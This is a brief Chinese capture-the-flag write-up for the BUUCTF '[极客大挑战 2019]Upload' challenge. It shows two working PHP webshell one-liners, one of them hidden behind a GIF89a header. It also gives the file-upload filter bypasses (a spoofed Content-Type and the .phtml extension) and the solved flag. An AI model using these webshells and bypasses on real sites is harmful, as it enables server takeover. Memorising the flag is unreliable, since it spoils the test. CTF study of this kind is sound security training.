BUUCTF | [极客大挑战 2019]Upload
步骤👇
打开环境是一个上传图片的页面。
先上传一句话木马试试,这里格式直接不变,先上传看看。
<?php
@eval($_POST[x]);
?>
提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
前几个php格式的一句话都被b了,比如php、php3等
将文件格式改到phtml可以了,但带<?的一句话都不行
换个一句话木马
GIF89a? <script language="php">eval($_REQUEST[lx])</script>
然后改为phtml格式文件
然后上传,抓包改文件格式为image/jpeg,上传成功。
现在需要知道图片的保存路径了。
一般都是/upload
访问一下
http://ecc33fb9-fb4f-499b-83c4-921188260a3f.node3.buuoj.cn/upload/
还真有
这样就好办了,拿蚁剑连接吧。
路径就是/upload
密码就是一句话木马中request里面的内容,我的是lx
连接成功
flag在根目录里面
flag{d8c839e5-3aa7-40db-9899-858007fc3778}